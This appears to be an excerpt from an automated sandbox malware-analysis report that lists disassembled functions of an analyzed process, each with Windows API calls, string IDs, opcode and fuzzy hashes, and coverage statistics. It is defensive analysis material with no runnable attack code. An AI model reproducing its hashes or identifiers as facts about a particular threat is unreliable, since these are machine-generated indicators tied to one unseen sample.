                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                  Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Item
                                                  • String ID:
                                                  • API String ID: 3888421826-0
                                                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                  Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00417B7B
                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                  • String ID:
                                                  • API String ID: 3727323765-0
                                                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                  Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                  • malloc.MSVCRT ref: 00417407
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                  • String ID:
                                                  • API String ID: 4284152360-0
                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                  Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F673
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                  • strlen.MSVCRT ref: 0040F6A2
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                  Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F6E2
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                  • strlen.MSVCRT ref: 0040F70D
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                  Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00402FD7
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                  • strlen.MSVCRT ref: 00403006
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                  Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                  • String ID:
                                                  • API String ID: 764393265-0
                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                  Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Time$System$File$LocalSpecific
                                                  • String ID:
                                                  • API String ID: 979780441-0
                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                  Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memcpy.MSVCRT ref: 004134E0
                                                  • memcpy.MSVCRT ref: 004134F2
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$DialogHandleModuleParam
                                                  • String ID:
                                                  • API String ID: 1386444988-0
                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                  Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                  Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: InvalidateMessageRectSend
                                                  • String ID: d=E
                                                  • API String ID: 909852535-3703654223
                                                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                  Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcschr.MSVCRT ref: 0040F79E
                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcschr$memcpywcslen
                                                  • String ID: "
                                                  • API String ID: 1983396471-123907689
                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                  Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                  • memcpy.MSVCRT ref: 0040C024
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FilePointer_memicmpmemcpy
                                                  • String ID: URL
                                                  • API String ID: 2108176848-3574463123
                                                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                  Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfmemcpy
                                                  • String ID: %2.2X
                                                  • API String ID: 2789212964-323797159
                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                  Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf
                                                  • String ID: %%-%d.%ds
                                                  • API String ID: 3988819677-2008345750
                                                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                  Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040E770
                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSendmemset
                                                  • String ID: F^@
                                                  • API String ID: 568519121-3652327722
                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                  Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PlacementWindowmemset
                                                  • String ID: WinPos
                                                  • API String ID: 4036792311-2823255486
                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                  Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                  • String ID: _lng.ini
                                                  • API String ID: 383090722-1948609170
                                                  • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                  • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                  Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                  • API String ID: 2773794195-880857682
                                                  • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                  • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                  Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID:
                                                  • API String ID: 438689982-0
                                                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                  Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                  Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memcmp.MSVCRT ref: 00408AF3
                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                  • memcmp.MSVCRT ref: 00408B2B
                                                  • memcmp.MSVCRT ref: 00408B5C
                                                  • memcpy.MSVCRT ref: 00408B79
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp$memcpy
                                                  • String ID:
                                                  • API String ID: 231171946-0
                                                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                  Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcslen$wcscat$wcscpy
                                                  • String ID:
                                                  • API String ID: 1961120804-0
                                                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                  Execution Graph

                                                  Execution Coverage:2.4%
                                                  Dynamic/Decrypted Code Coverage:20.5%
                                                  Signature Coverage:0.5%
                                                  Total number of Nodes:844
                                                  Total number of Limit Nodes:16
